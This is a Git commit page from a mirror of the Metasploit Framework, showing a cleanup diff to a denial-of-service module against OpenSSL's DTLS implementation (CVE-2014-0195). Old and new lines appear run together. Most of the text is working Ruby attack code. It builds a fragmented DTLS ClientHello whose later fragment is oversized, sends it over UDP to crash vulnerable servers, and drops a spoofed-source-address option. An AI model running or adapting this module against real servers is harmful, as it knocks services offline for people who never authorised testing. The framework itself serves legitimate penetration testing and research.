infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor cleanup

unstable
jvazquez-r7 2014-06-09 13:23:56 -05:00
parent 06e45e8253
commit daf662b3c0
1 changed files with 14 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
View File

@ -8,36 +8,36 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos include Msf::Auxiliary::Dos
# include Msf::Exploit::Capture
include Exploit::Remote::Udp include Exploit::Remote::Udp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS',
'Description' => %q{ 'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in This module performs a Denial of Service Attack against Datagram TLS in
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h. OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
This occurs when a DTLS ClientHello message has multiple fragments and the This occurs when a DTLS ClientHello message has multiple fragments and the
fragment lengths of later fragments are larger than that of the first, a fragment lengths of later fragments are larger than that of the first, a
buffer overflow occurs, causing a DoS. buffer overflow occurs, causing a DoS.
}, },
'Author' => [ 'Author' =>
'Jon Hart <jon_hart[at]rapid7.com>', #original code [
], 'Jon Hart <jon_hart[at]rapid7.com>', #original code
],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2014-0195' ], ['CVE', '2014-0195'],
['ZDI', '14-173'],
['BID', '67900']
], ],
'DisclosureDate' => 'Jun 05 2014')) 'DisclosureDate' => 'Jun 05 2014'))
register_options([ register_options([
Opt::RPORT(4433), Opt::RPORT(4433),
OptInt.new('VERSION', [true, "SSl/TLS version", 0xFEFF]), OptInt.new('VERSION', [true, "SSl/TLS version", 0xFEFF])
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
], self.class) ], self.class)
deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
end end
def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil) def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil)
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C') fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C')
# add a large fragment where the length is significantly larger than that of the first # add a large fragment where the length is significantly larger than that of the first
# TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations # TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations
fragments << build_tls_fragment(1, 1234, 0, 0, 123, 'A' * 1234) fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments) message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
connect_udp connect_udp
print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}") print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}")